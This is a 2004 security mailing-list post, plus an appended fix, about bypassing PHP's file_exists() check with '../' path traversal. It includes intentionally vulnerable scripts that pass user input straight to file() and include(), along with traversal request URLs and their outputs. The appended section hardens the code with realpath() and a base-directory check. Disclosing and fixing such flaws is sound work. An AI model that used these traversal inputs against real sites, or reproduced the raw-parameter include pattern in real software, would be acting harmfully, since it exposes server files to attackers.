[Full-Disclosure] file_exists() bypassing , critical problem ?
- To: <full-disclosure@lists.netsys.com>
- Subject: [Full-Disclosure] file_exists() bypassing , critical problem ?
- From: "Nourredine Himeur" <lostnoobs@security-challenge.com>
- Date: Mon, 2 Feb 2004 11:12:28 +0100
Hi,
There is a security problem in the file_exists() function which allows
unauthorized users to bypass the function.
For example, a user uses this function to check the existence of his file
"my_file.php" in the "/test" directory and to display its source code.
He uses for this a script like this one:
----- file_exists.php -----
<?php
if(file_exists($var)){
echo("File exist<br><br>");
$source = file( $var );
while ( list( $num_line, $line ) = each( $source ) )
{
echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>";
}
}else{
echo("File doesn't exist<br><br>");
$source = file( $var );
while ( list( $num_line, $line ) = each( $source ) )
{
echo "<B>Line $num_line:</B> ".htmlspecialchars( $line ) . "<br>";
}
}
?>
----- file_exists.php -----
He tests his script with the following address on his server:
http://[server]/test/file_exists.php?var=my_file.php
The file "my_file.php" contains the following text:
----- my_file.php -----
PHP is a widely-used
general-purpose scripting
language that is especially
suited for Web development
and can be embedded into HTML.
----- my_file.php -----
After launching his script, he obtains:
----- http://[server]/test/file_exists.php?var=my_file.php -----
File exist
Line 0: PHP is a widely-used
Line 1: general-purpose scripting
Line 2: language that is especially
Line 3: suited for Web development
Line 4: and can be embedded into HTML.
----- http://[server]/test/file_exists.php?var=my_file.php -----
Up to here everything seems to be normal.
If he tests it with another file name, he obtains:
----- http://[server]/test/file_exists.php?var=another_file.php -----
File doesn't exist
Warning: file(test): failed to open stream: No such file or directory in
/home/xxx/www/test/file_exists.php on line 11
Warning: Variable passed to each() is not an array or object in
/home/xxx/www/test/file_exists.php on line 12
----- http://[server]/test/file_exists.php?var=another_file.php -----
It's normal too...
But, if a user tests this script with, for example, the following link:
http://[server]/test/file_exists.php?var=anything/../my_file.php, he
obtains:
----- http://[server]/test/file_exists.php?var=anything/../my_file.php -----
File doesn't exist
Line 0: PHP is a widely-used
Line 1: general-purpose scripting
Line 2: language that is especially
Line 3: suited for Web development
Line 4: and can be embedded into HTML.
----- http://[server]/test/file_exists.php?var=anything/../my_file.php -----
We can see that the file_exists() function returns that the file doesn't
exist, but the source code has been displayed.
It's a very critical bug because a malicious user can use it to bypass
the file_exists() protection in an include() script, for example.
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Another, simpler example:
In the same directory:
test.php
-----------------------------------------------------------
<?
if(file_exists($page)){
echo("Sorry the local page is protected");
}else{
include($page);
}
?>
-----------------------------------------------------------
file.txt
-----------------------------------------------------------
Hello Word
-----------------------------------------------------------
http://www.example.com/test.php?page=file.txt
Result:
Sorry the local page is protected
http://www.example.com/test.php?page=./foo/../file.txt
Result:
Hello Word
The function file_exists() is bypassed.
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
I want to know if you think that's a real vulnerability or not.
(SecurityFocus says NO and doesn't want to publish it.)
If you have any questions, don't hesitate to contact me.
Nourredine Himeur
lostnoobs@security-challenge.com
www.security-challenge.com
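Both scripts in the post hand the raw request parameter to file_exists() and then, separately, to file() or include(), so the check and the use can disagree about which file a path such as anything/../my_file.php names. Below, as an added example that is not part of the original post, is a version of file_exists.php that resolves the path once with realpath(), requires the result to lie under an allowed base directory, and then reads only the resolved path; $base, resolve_inside() and the assumption that the served files sit beside the script are mine, not the author's.

```php
<?php
// Added example (not from the original post): resolve the user-supplied
// path once and reuse the resolved path for both the check and the read,
// so the two operations cannot refer to different files.

function resolve_inside($base, $userPath)
{
    // realpath() canonicalises "." and ".." segments and symlinks, and
    // returns false when the path does not exist at all, so the existence
    // check and the normalisation happen in one step.
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($baseReal === false || $target === false) {
        return false;
    }
    // Require the resolved target to sit strictly below the base directory,
    // so a "../" sequence cannot escape it.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $target;
}

// Assumption: only files in the script's own directory may be shown.
$base = __DIR__;
$var  = isset($_GET['var']) ? $_GET['var'] : '';

$resolved = resolve_inside($base, $var);
if ($resolved === false || !is_file($resolved)) {
    echo "File doesn't exist<br><br>";
    exit;
}

echo "File exist<br><br>";
// Read the *resolved* path, never the raw $var.
foreach (file($resolved) as $num_line => $line) {
    echo "<B>Line $num_line:</B> " . htmlspecialchars($line) . "<br>";
}
?>
```

With this version the request var=anything/../my_file.php either resolves to the same canonical path as var=my_file.php, in which case both branches agree, or fails to resolve, in which case nothing is read. The same pattern applies to the test.php example: decide what include() may load from the resolved path (ideally against an allowlist of permitted files rather than a "protected" denylist), and pass that resolved path, not $page, to include().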